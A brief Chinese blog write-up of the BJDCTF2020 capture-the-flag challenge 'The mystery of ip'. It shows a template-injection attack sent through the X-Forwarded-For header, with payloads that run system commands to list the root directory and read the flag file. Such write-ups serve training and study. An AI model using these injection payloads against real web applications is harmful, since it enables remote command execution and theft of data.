[BJDCTF2020]The mystery of ip
打开题目
发现一个flag标签打开
看到了页面获取了本机的ip,看到ip就想到了X-Forwarded-For:
抓取flag页面,添加X-Forwarded-For:
构造payload,系统命令查看根目录下的所有文件,第一次发现还可以这么玩
X-Forwarded-For:{system("ls /")}
发现敏感文件flag
尝试获取
X-Forwarded-For:{system("cat /flag")}
得到flag
如果您觉得阅读本文对您有帮助,请点一下“推荐”按钮,您的“推荐”将是我最大的写作动力!欢迎各位转载,但是未经作者本人同意,转载文章之后必须在文章页面明显位置给出作者和原文连接,否则保留追究法律责任的权利。
本文作者:木易
本文链接:https://www.cnblogs.com/mu-yi2/p/16818460.html
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步